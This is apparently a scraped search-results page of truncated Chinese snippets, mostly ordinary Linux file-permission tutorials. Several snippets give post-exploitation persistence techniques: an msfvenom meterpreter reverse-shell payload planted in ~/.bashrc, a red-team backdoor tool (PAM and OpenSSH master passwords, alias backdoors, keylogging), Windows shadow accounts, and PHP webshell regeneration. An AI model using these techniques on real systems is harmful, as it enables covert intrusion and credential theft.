今天在一个全新的Ubuntu16.04主机上配置PHP,MySQL,Nginx环境。 这种事情我已经做过很多遍了。应该是信手拈来。...环境很快就搭建起来了,本地浏览器访问主机IP后确始终显示不出来页面。 我配置的是8001端口,难道防火墙限制了? 这个主机是天猫聚石塔用的,查了文档果然有如下说明: ?...nginx中的fastcgi_param段配置有误, 一个是文件权限问题。...所以我觉得是文件权限问题。 先后给项目目录 加 www-data 用户组,给 /run/php/php-fpm.sock 提高权限。依然不行。...而/root的权限是 drwx------ 当我执行完 chmod 755 /root。 页面终于打开了,我只想说一句,Linux真难啊。
简介 前一段时间,朋友问了一个这样的问题:Linux 普通权限,没有crontab 之类的,如何做权限维持。...我之前介绍过好多好多种 Linux 权限维持的方法,大多数还是基于 root 权限的,如果不提权的话,有些手法还是受限的,比如 motd,服务之类的。...于是,我选择了最简单的配置文件 ~/.bashrc 这个文件是在所属用户每次登录的时候会自动进行执行配置的一个文件,当然,前提得是用户系统使用的 shell 是 bash 但这都不是什么重点,主要是这里要介绍一个之前没有介绍过的小技巧...,比如我们使用 msf 生成一个 Python木马,放入到这个配置文件中 msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT...配置好监听,重新登录试试 可以看到这个也可以成功反弹 shell,那么如果我们不配置监听,看看登录会不会卡住 可以看到,登录没有卡住,和正常登录没有区别 其实呢,这也是我埋在 alias后门 | Linux
:vim、>、>> x 可执行权限:Shell与Python 对于目录: 读取权限:查看目录内容 写入权限:能够创建、删除、修改等目录的内容 执行权限:能够cd切换到此目录下 归属关系 所有者:拥有此文件...命令查看 权限位字段解析 一共10个字符,分为4组 [表格] linux中判断用户具备的权限 顺序:所有者>所属组>其他人,原则是匹配及停止 ls -ld 目录路径 修改权限 chmod命令 格式:chmod...【ugoa】【+-=】【rwx】路径 解释 u:修改所有者权限 -g:修改所属组权限 -o:修改其他人权限 -a:修改所有人权限 -R:递归修改权限 chmod -R u+r /test 修改归属关系...w表示2 x表示1 文件目录的默认权限 目录:755 文件:644 umask命令设置默认权限 目录是用最高权限777 减去默认的umask值022 默认权限得出的755 文件是用权限666减去默认的umask...(Group)的 x 位 显示为 s 或 S,取决于属组是否有 x 权限 对目录有效 在一个具有SGID权限的目录下,新建的文档会自动继承此目录的属组身份 Set UID 占用属主(User)的x位 显示为
欢迎来到薄荷冰的linux系列 下面我们将按照下面的图为大家讲解linux权限相关的知识 一.linux下用户的分类 在linux中有两种用户:超级用户(root)、普通用户。...超级用户:可以再linux系统下做任何事情,不受限制。 普通用户:在linux下做有限的事情。 可以看到超级用户的命令提示符是“#”,普通用户的命令提示符是“$”。...三.sudo 命令:sudo + 指令 场景:【信任白名单中的普通用户】 功能:提高普通用户的权限,【再输入普通用户的密码后】完成一些普通用户完成不了的指令。...假设默认权限是 mask ,则实际创建的出来的文件权限是 : mask & ~umask 格式 : umask 权限值 说明 :将现有的存取权限减去权限掩码后,即可产生建立文件时预设权限...y rm: 无法删除"/home/abc.c": 不允许的操作 当一个目录被设置为 " 粘滞位 "( 用 chmod +t), 则该目录下的文件只能由 一、超级管理员删除 二、该目录的所有者删除
Linux 权限 1 什么是权限 关于Linux的权限问题,可以理解为不同级别的工作者,分别拥有不同的能力来管理文件。...1.1 Linux用户 Linux 一般有两种用户 超级用户:可以再linux系统下做任何事情,不受限制 普通用户:在linux下做有限的事情。...权限 == 实行操作的人 + 文件具体属性 相当于 我是一个什么人 和 我将要操作的事物允不允许我操作 。 如果我是语文老师 那我肯定不能到医院给人民治病。、 Linux的权限合乎常识。...格式: umask 权限值 说明:将现有的存取权限减去权限掩码后,即可产生建立文件时预设权限。 超级用户默认掩码值为0022,普通用户默认为0002 file 指令 功能说明:辨识文件类型。...可写权限: 如果目录没有可写权限, 则无法在目录中创建文件, 也无法在目录中删除文件 而且十分重要的一点是: 能不能删除文件,取决于所属目录的权限!!!
工具介绍 通过渗透拿到权限之后,为了不让权限丢失,都会进行权限维持,而在进行权限维持的时候,红队需要花费大量的时候,来验证是否合适,因此在这款工具就诞生 HackerPermKeeper[黑客权限保持者.../video/BV1fV411N7Qc/ 常见后门介绍 OpenSSH后门万能密码&记录密码(这个需要依赖环境),就是把对方的门换个锁,但是原来的钥匙也可以使用 发现程度:|| PAM后门,PAM是一个...Linux登录验证的认证服务,修改其中关于ssh登录的验证,添加一个万能密码,已经记录的账号密码位置(类似把对方房间内有内鬼) 发现程度:|| SSH软链接 cat /etc/ssh/sshd_config...我们可以把他当成一个键盘记录的后门,来扩大我们的信息收集范围 可以记录ssh明文和密钥(登录的)和Rootkit配合一起 发现程度:|||| 命令自定义-Alias后门 alias命令的功能:为命令设置别名...| 但是使用工具进行检测出来情况很大,建议看代码,手动编写此工具(难度很大) history不记录执行命令 在输入命令时候,添加空格 ssh软链接&crontab 快速生成软链接[需要运行脚本成功后,
在Linux系统中使用 ll 命令可以看到文件的权限信息,如图: 接下来主要解释一下这些权限的含义: 可以看到总的十个字符: 1、第一个字符表示文件类型: d 表示是目录 - 表示是文件 l...,如果没有权限则用 -表示。...Linux文件的基本权限分为9个,总共三组,分别为拥有者(owner),所属组群(group)和其他人(others),其中每组身份又拥有各自的读(read),写(write),执行(execute)权限...可以用数字和字母来分别表示读 r(4),写 w(2),执行权限 x(1)。...drwxr-xr-x 表示这是一个目录文件,文件拥有者有读,写,执行权限,所属组群没有写权限,有读,执行权限,其它用户没有写权限,有读,执行权限。
0x00:简介 何为“后渗透”?就是获取到受害者服务器的权限后,再继续对受害者服务器进行长期攻击或者信息获取的一种持续性手段。...0x01:实验 一、影子账户 原理:创建一个跟普通用户一样的用户,但是只能在注册表中才能查看到的用户。 net user luomiweixiong$ /addnet user ?...> 说明:此脚本会每8秒不断的向服务器生成一个“phpinf0.php”的一句话木马....–> 利用成功前提下必须有以下三个文件, 1、PHP的正常文件 2、修改后.user.ini文件 3、luomiweixiong.gif木马 ? ?...六、Powershell权限维持 参考此PowerShell脚本 https://github.com/re4lity/Schtasks-Backdoor 利用代码: powershell.exe-exec
2.4 Linux中文件的权限 经过上面的介绍,一个文件的属性还剩下一些: 第一个字符表示文件的类型;第2~10字符表示文件的属性权限,三三为一组,分别对应拥有者,所属组,other,且由root或普通用户承担这三个角色...很简单一个道理,Linux系统不以文件后缀作为区分文件类型的依据,但并不代表gcc不需要,Linux系统 != gcc。...能执行 = 具有可执行权限 + 你是一个可执行文件,如下图: 2.5 Linux中目录的权限 2.5.1 问题一 如果我们进入一个目录,需要什么权限?...目录的属性就是ls -l后的内容,而目录的内容是该目录里面的所有的文件信息详细数据。...首先这个文件,不能在我们各自的家目录下创建,因为一般家目录是只对拥有者开放的(参考上面创建家目录后的权限,如:drwx------ 4 lzw lzw 4096 Feb 21 10:09 lzw),其他人都进不去
今天,凯哥修改自己的公众号的时候,遇到了一个问题:那就是上传后的文件访问不到,使用浏览器访问不到了。怎么办呢?经过多次查询,发现竟然是因为tomcat的配置原因!...正文: 最近在Linux系统中通过tomcat部署项目后,由于程序有上传文件功能。而上传后的却无法查看文件(通过createNewFile创建)。...我们知道在Linux系统规定,创建文件的最高权限为666,而创建文件夹的最高权限为777,系统通过变量umask来控制创建文件的权限问题。...分析后,想,会不会是tomcat自己搞的鬼呢?于是,搜索后,看到一篇文章: 通过研究发现,Linux通过umask变量来控制创建文件的默认权限问题。...但Linux系统umask的默认值是0022,也就是说创建的文件应该是644的权限,而上传的文件却是640的权限。
查看文件权限 ls-l命令 修改文件权限 修改方法1:(参数) 命令:chomod 语法:chomod [参数][augo][+-=][rwx]文件名 例子: 1.将文件file1.txt增加可读权限...chmod ugo+r file1.txt 2.将文件file1.txt设为所有人(all)可读 chmod a=r file1.txt 3.为ex1.py文件拥有者取消可执行权限 chmod u-x...ex1.py 修改方法2:(数字) 命令:chmod 语法:chmod abc 文件名 其中a,b,c各为一个数字,分别表示User、Group、及Other的权限。...例子 1.将文件file1.txt设为可读可写可执行权限 chmod 777 file1.txt 和chmod a=rwx file1.txt 和chmod ugo=rwx file1.txt 效果相同...修改方法3:(递归赋权) 命令:chmod 语法:chmod -R 例子: 将directory1目录及目录里文件设为可读可写可执行权限 chmod -R 777 directory1 版权声明:本文内容由互联网用户自发贡献
前言 本节小编主要介绍Linux的权限。什么是权限?权限就是限制一个人可以干什么,不可以干什么。比如你可以在力扣上刷题,但是你不能在力扣是听音乐,这是力扣的属性决定的。...概述 Linux有两种类型的用户: 超级用户(root):可以在Linux下做任何事情,不受任何约束 普通用户:在Linux下做有有限的事情 超级用户的命令提示符是“#”,普通用户的命令提示符是“$”...假设默认权限是mask,则实际创建的出来的文件权限是: mask & ~umask 格式: umask 权限值 说明: 将现有的存取权限减去权限掩码后,即可产生建立文件时预设权限。...普通用户创建一个普通文件,它的权限都是664 普通用户创建一个目录,它的权限都是775 为什么会出现上述情况?...权限掩码就像一个漏斗,对默认权限进行“过滤”,得到的才是最终权限。
文件权限 ls命令结果介绍 -l中显示的内容如下: -rwxrw-r‐-1 root root 1213 Feb 2 09:39 abc - 第一个字符代表文件(-)、目录(d),链接(l)- 10个字符确定不同用户能对文件干什么...用户名,改变该用户登录的初始目录 【综合案例】 【题1.1】建立两个用户组group1和group2,以及三个用户dennis、daniel、abigale,并且将前2个用户分配在group1用户组下,后一个分配在...【题1.2】以dennis用户登录,创建一个Hello.java文件 【题1.3】以daniel用户登录,观察是否可以访问/home/dennis目录以及读或写其创建的Hello.java文件 【题1.4...【参考】 - groupadd 组名,在linux中添加组 - vi /etc/group,查看linux中所有组信息,可以看可以编辑 - cat /etc/group,查看linux中所有组信息,只可以看不可以编辑...linux中所有用户信息,只可以看不可以编辑
用户与用户组 Linux 的文件权限是和 用户与用户组 密切相关的一个概念,对于一个文件来说,用户可以分为三类: 文件的 拥有者 - user 文件的拥有者所在 用户组 的其他成员 - group 除...Linux 中文件可以分为 5 个类型, ls -l 输出的每条信息中的 第一个字符 就用于表示文件类型。...权限的作用 同一个权限对于 文件 和 目录 来说,含义是不一样的,这里来了解一下。...权限 文件 目录 r 可以读取文件内容 可以读取目录结构列表 w 可以编辑修改文件内容 可以改动目录结构列表 x 可以被系统执行 用户可以进入目录 (cd) 这里需要注意的一个权限是:可以改动目录结构列表...原文:https://rgb-24bit.github.io/blog/2018/linux-file-permission.html 相关文章 Linux之chmod命令 Liunx之chown命令
,对Linux渗透是十分重要的,借用大佬的一句话“Linux的对抗比的就是你跟运维谁的水平更高一点” 如果没有看过前面几篇文章的小伙伴可以移步《Linux目录结构及开机流程详解》、《Linux重定向及反弹...shell详解》、《Linux文件查找命令详解》 目录 0x01 用户和组 0x02 文件权限 0x01 用户和组 Linux必须要有用户,即使是一个虚拟的用户,这个在后面会说到,同时用户在系统中还拥有一个唯一的标识...有了用户就对应的会有一个用户组,用户组在系统中也同样拥有一个标识GID(Group Identify) 在Linux中有一个特点,只要有用户,这个用户一定会属于一个用户组,一个用户至少需要属于一个用户组...0x02 文件权限 前面说完了用户和用户组的权限,然后说一下文件所拥有的权限 我们可以发现第三列和第四列有两列都是root,它们的含义是不一样的 第一个root是用户权限,即用户或属主,文件的所有者 第二个...推荐阅读 Linux文件查找命令详解 这居然是一个RCE漏洞 Linux重定向及反弹shell详解 部署IIS+PHP+Oracle环境 Linux目录结构及开机流程详解
Linux权限 一、Linux 权限的概念 Linux 下有两种用户:超级用户(root)、普通用户。...超级用户:可以在 Linux 系统下做任何事情,不受限制; 普通用户:在 Linux 下做有限的事情。...所以总结一下: 是否允许一个指定用户查看目录的文件列表,需要 读( r) 权限。 是否允许一个指定用户在当前目录下新建文件或删除文件,需要 写(w) 权限。 进入一个目录需要 执行(x) 权限。...一个文件一定是属于一个目录的,一个文件能不能被查看,是由目录的权限决定的。...所以我们回过头来看,为什么要有权限掩码,我们到现在应该可以猜到了,是为了保护目录和文件的安全,具体一点,就是不让 other 组对我们的目录和文件构成威胁。 那么权限掩码是怎么做到的呢?
Linux文件权限 本文目录 1 拥有者、群组和其他人 2 文件的权限 3 目录的权限 4 root 5 更改所有者、群组和权限 chown chgrp chmod 5.1 chown 5.2 chgrp...在Windows中,可执行文件的后缀名一般是.exe或.msi等等,但是在Linux中,文件是否可执行与文件名无关,只要文件具有x权限,那么文件就是可执行的。...x:将该目录作为工作目录的权限。 需要注意的是,如果一个目录只给了用户r权限,那么用户只能看到该目录下的文件名,并不能查看该目录下的文件的内容。查看目录下的文件的内容需要x权限。...如果用户具有对目录的w权限,那么该用户就可以对目录下的文件进行相应的更改,而不需要考虑是否具有该文件的相应权限。 root 有一个用户,它可以对Linux中的任何文件进行任何操作,它就是root....…… 对于一个文件,其对于拥有者、所属组和其他人的权限可以用三个数字表示。
linux基本权限只是规定了所有者、属组、其他人三种用户的权限,如果希望对文件或文件夹做一些特殊的权限设置呢?...一、特殊权限的介绍 之前我们提到了特殊权限有三个,这三个特殊权限是在可执行程序运行时影响操作权限的,它们分别是SUID,SGID,sticky-bit位 特殊权限 说明 SUID 当一个设置了SUID...SGID 当一个设置了SGID 位的可执行文件运行时,该文件将具有所属组的特权,任意存取整个组所能使用的系统资源;若一个目录设置了SGID,则所有被复制到这个目录下的文件,其所属的组都会被重设为和这个目录一样...stickybit 对一个文件设置了sticky-bit之后,尽管其他用户有写权限,也必须由属主执行删除、移动等操作;对一个目录设置了sticky-bit之后,存放在该目录的文件仅准许其属主执行删除、移动等操作...一个典型的例子就是passwd命令,这个命令允许用户修改自己的密码。
隐藏权限的介绍 有时候你发现即时使用的是root用户也不能修改某个文件,大部分原因是因为使用过chattr命令锁定了该文件,这个命令的作用很大,通过chattr可以提高系统的安全性,但是这个命令并不适合所有的目录...与我们前面看到的chmod这些命令修改权限不同的是chattr修改的是更底层的属性,这里面我们所提到的隐藏权限指的就是使用chattr来设置属性 隐藏权限的设置和查看 chattr的用户与我们之前讲的chmod...,chow这些命令相似,都是直接对需要修改的文件进行操作就可以了 chattr命令:为文件设置隐藏权限 命令选项 + 增加权限 - 删除权限 = 赋予什么权限,文件最终权限 A 文件或目录的atime不可被修改...lsattr命令: 查看文件隐藏权限 通过案例学习命令用法: 给file1文件添加AaiSd权限 [root@zutuanxue test]# chattr +AaiSd file1 查看文件file1...隐藏权限 [root@zutuanxue test]# lsattr file1 --S-iadA---------- file1 设置删除file1文件隐藏权限 - 可以使用-号 - 可以使用
查看权限 ls -l 权限说明 权限字符 r:读 w:写 x:执行 文件类型 d:文件夹 -:普通文件 l:软链接(类似Windows的快捷方式) b:块设备文件(例如硬盘、光驱等) p:管道文件 c:...字符设备文件(例如屏幕等串口设备) s:套接口文件 权限结构 -rwxrwxrwx 第1位:文件类型 第2-4位:文档所有者的权限 第5-7位:文档所有者同在一个组的用户的权限 第8-10位:其它用户的权限...其它表示方法 字符表示法 二进制 八进制数值表示法 说明 --- 000 0 无权限 r-- 100 4 仅可读 -w- 010 2 仅可写 --x 001 1 仅可执行 rw- 110 6 可读可写...r-x 101 5 可读可执行 -wx 011 3 可写可执行 rwx 111 7 可读可写可执行 权限命令 更改权限 # 格式 chmod (-R)[参数] 权限 文件名 用户符号 u:拥有者...g:拥有者同组用 o:其它用户 a:所有用户 权限字符 r:读 w:写 x:执行 分配方式 +:新增权限 -:删除权限 =:设置权限 使用样例 # 更改权限 chmod u+w a.txt chmod
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
